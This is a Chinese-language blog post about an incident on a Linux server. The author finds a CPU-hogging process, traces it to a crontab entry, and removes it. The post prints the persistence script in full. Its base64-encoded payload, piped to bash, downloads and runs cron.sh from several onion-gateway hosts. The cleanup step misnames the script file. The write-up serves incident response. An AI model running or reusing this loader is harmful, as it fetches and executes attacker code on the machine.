最近因為工作需要申請了3臺linux虛擬機，因為需要多人多地協作，所以開通了互聯網訪問權限，即給每天服務器配置了公網IP，有一天突然發現服務器運行速度巨慢，就上服務器進行查看，下面把整個過程如實記錄，希望幫助到也有此遭遇的朋友。

查看異常進程

登錄到服務器使用top命令查看進程使用服務器資源情況，發現有一個進程cpu使用率300%多，而且這個進程的名字很奇怪，是一個隨機字符串，截圖如下：

top命令執行

kill掉該進程

使用命令kill -9 748結束該進程，發現cpu的占有率立即下降到合理水平，而且服務器的整體響應速度明顯提升，從而確定就是該進程搗的鬼。

死灰復燃

但是過了一段時間后又出現了服務器響應速度變慢的情況，又執行了以上操作，從而確定該進程是被后臺定時啟動的，再一次檢查系統定時任務，使用命令crontab -l，發現了確實有一個定時任務，如下：

[root@rabbit03 ~]# crontab -l0 * * * * ~/.systemd-login[root@rabbit03 ~]# 

再一次top查看進程，發現systemd-login進程在列，于是開始查看這個shell具體是做什么的，使用more命令查看：

more ~/.systemd-login#!/bin/bashexec &>/dev/nullsleep $((RANDOM % 600)){echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KKHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby50b3Iyd2ViLmlvL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLnRvcjJ3ZWIuaW8vY3Jvbi5zaCB8fCB3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIHJhcGlkN2NwZnFud3hvZG8uZDJ3ZWIub3JnL2Nyb24uc2ggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSByYXBpZDdjcGZxbnd4b2RvLmQyd2ViLm9yZy9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5tbi9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IGN1cmwgLW0xODAgLWZzU0xrQS0gcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi50by9jcm9uLnNoIHx8IHdnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgcmFwaWQ3Y3BmcW53eG9kby5vbmlvbi5pbi5uZXQvY3Jvbi5zaCB8fCBjdXJsIC1tMTgwIC1mc1NMa0EtIHJhcGlkN2NwZnFud3hvZG8ub25pb24uaW4ubmV0L2Nyb24uc2gpfGJhc2gK}|{base64,-d}|bash

是base64后的執行腳本，于是將這個base64放到在線解碼系統中解碼，得到如下明碼：

解碼后腳本

從而發現該腳本是從遠程服務器獲取執行代碼，然后隨機時間啟動，是一種典型的腳本注入入侵。

徹底清除

既然已經找到問題的根源就好處理了。

1. 斷開互聯網服務，避免再次被注入

2. 刪除定時任務，命令如下：

crontab -e

刪除該條定時任務。

3. 刪除定時任務執行腳本文件.system-login